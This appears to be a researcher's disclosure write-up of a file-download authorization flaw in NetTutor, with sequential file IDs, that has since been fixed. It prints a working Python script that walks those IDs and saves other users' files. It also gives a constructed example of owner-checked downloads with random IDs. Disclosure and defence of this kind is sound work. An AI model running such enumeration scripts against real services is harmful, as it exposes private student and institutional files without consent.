Link-Systems International
In December 2023, I identified a significant security vulnerability in NetTutor, a service of Link-Systems International, Inc. The vulnerability put the privacy and security of users across various educational institutions at risk.
The Vulnerability Explained
NetTutor’s system lacked proper authentication checks for file downloads. This meant that any user could potentially access and download files uploaded by others without permission. These files could belong to individuals from different schools, institutions or paying users.
The Technical Flaw
The specific flaw lay in the file signature verification process: NetTutor did not adequately verify that the person requesting a download was authorized to receive that file. Furthermore, the file IDs were sequential and incremented by 2, which made it trivial to predict and request the next file in the sequence.
Demonstrating the Issue
To illustrate how easily this vulnerability could be exploited, I wrote a Python script that automated downloading files by their IDs. The script used a simple loop and the requests library to send GET requests to the server, incrementing the file ID on each attempt.
import requests
import time

# Initial file ID to start with
# PID is the file ID
pid = [REDACTED]

while True:
    url = f"[REDACTED]?id=l&db=[REDACTED]&todo=file&pid={pid}"
    print(f"Trying GET request to: {url}")
    try:
        # Send a GET request to the server
        response = requests.get(url, allow_redirects=True)
        response.raise_for_status()

        # Check for 'Content-Disposition' in the response headers
        content_disposition = response.headers.get('content-disposition')
        if content_disposition:
            # Extract the filename from the 'Content-Disposition' header
            filename = content_disposition.split('filename=')[1]
            if filename != '[REDACTED]':
                # Write the file content to a local file
                with open(f"{pid} - (unknown)", 'wb') as out:
                    out.write(response.content)
                # Increment the file ID by 2
                pid += 2
            else:
                print("File name is '[REDACTED]', trying again...")
        else:
            print("No 'Content-Disposition' in headers, trying again...")
    except requests.HTTPError as http_err:
        print(f"HTTP error occurred: {http_err}")
    except Exception as err:
        print(f"An error occurred: {err}")

    # Wait before the next request
    time.sleep([REDACTED])
⚠️ This script was used to demonstrate the vulnerability. The downloaded content was not viewed and was promptly destroyed. ⚠️
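For contrast, here is an added example (my own constructed code, not NetTutor's or Link-Systems' implementation) of how a download handler closes both gaps described above: every request is tied to an authenticated user, the file is released only to its owner or someone it was shared with, and file IDs are random tokens rather than a sequence that can be stepped through by adding 2. The FileStore class, its in-memory storage and the users "alice" and "bob" are all assumptions for the demonstration.

```python
import secrets
from dataclasses import dataclass, field


@dataclass
class StoredFile:
    owner: str
    name: str
    content: bytes
    shared_with: set = field(default_factory=set)


class FileStore:
    """Constructed in-memory store; a real service would back this with a database."""

    def __init__(self):
        self._files = {}
        self.denied = []  # audit trail of refused downloads (user, file_id)

    def upload(self, owner, name, content):
        # Opaque random ID: there is no "next" ID for a client to guess.
        file_id = secrets.token_urlsafe(16)
        self._files[file_id] = StoredFile(owner, name, content)
        return file_id

    def share(self, actor, file_id, other_user):
        # Only the owner may grant access to someone else.
        f = self._files.get(file_id)
        if f is None or f.owner != actor:
            raise PermissionError("only the owner may share a file")
        f.shared_with.add(other_user)

    def download(self, session_user, file_id):
        # 1. Authentication: an anonymous request never reaches file data.
        if not session_user:
            self.denied.append((None, file_id))
            return None
        f = self._files.get(file_id)
        # 2. Authorization: "missing" and "not yours" get the same answer,
        #    so the ID space cannot be probed for files that exist.
        if f is None or (f.owner != session_user and session_user not in f.shared_with):
            self.denied.append((session_user, file_id))
            return None
        return f.name, f.content
```

The denied list is the kind of signal a defender would forward to logging: a single session accumulating many refusals is the enumeration pattern the script above would produce.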
Responsible Disclosure and Swift Action
After discovering this vulnerability, I responsibly reported it to Link-Systems International, Inc. The company quickly addressed the issue, implementing a fix to prevent unauthorized file access. This prompt response helped to secure the platform and protect the data of its users.